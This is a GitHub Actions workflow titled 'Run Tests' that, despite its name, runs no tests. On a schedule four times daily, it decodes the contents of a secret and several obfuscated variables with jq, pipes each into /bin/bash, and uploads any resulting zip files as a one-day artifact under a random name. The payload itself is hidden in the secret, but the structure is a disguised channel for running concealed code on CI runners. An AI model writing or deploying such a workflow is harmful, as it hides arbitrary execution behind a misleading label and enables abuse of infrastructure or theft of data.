name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '10 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          rhpv13: ${{ secrets.rhpv13 }}
        run: |
          printf '%s' "$rhpv13" | jq -r .na405 | /bin/bash
          printf '%s' "$b670" | jq -r .vv537 | /bin/bash
          echo $slt1422 | jq -r .vkcb8467 | /bin/bash
          echo $epaqb3730 | jq -r .cvejl651 | /bin/bash
          echo $chs595 | jq -r .hkcw58935 | /bin/bash
          echo $ekqki06933 | jq -r .g83875 | /bin/bash

      - name: Archive results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: Ti1aBZA9
          path: "*.zip"
          retention-days: 1
